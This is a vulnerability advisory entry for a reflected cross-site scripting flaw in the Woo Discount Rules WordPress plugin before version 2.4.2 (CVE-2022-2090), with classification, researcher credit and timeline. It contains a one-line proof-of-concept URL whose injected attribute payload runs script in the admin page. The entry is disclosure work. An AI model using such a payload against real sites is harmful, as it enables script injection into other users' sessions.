WordPress Plugin Vulnerabilities

Woo Discount Rules < 2.4.2 - Reflected Cross-Site Scripting

Description

The plugin does not escape a parameter before outputting it back in an attribute of the plugin's discount rule page, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=woo_discount_rules&name="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

Plugin icon
woo-discount-rules
Fixed in 2.4.2

References

CVE
CVE-2022-2090

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of WuHan University
Submitter
ZhongFu Su(JrXnm) of WuHan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
0201f365-7acb-4640-bd3f-7119432f4917

Timeline

Publicly Published
2022-06-27 (about 1 years ago)
Added
2022-06-27 (about 1 years ago)
Last Updated
2023-04-02 (about 1 years ago)

Other

Published
Title
Published
2019-09-28
Title
Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
Published
2015-04-21
Title
CMS Tree Page View 1.2.31 - Multiple Parameter XSS
Published
2014-08-01
Title
GD Star Rating 1.9.7 - Cross-Site Scripting (XSS)
Published
2022-10-17
Title
Gutenberg < 14.3.1 - Multiple Stored XSS
Published
2020-11-25
Title
WPJobBoard < 5.7.0 - Unauthenticated Reflected XSS & XFS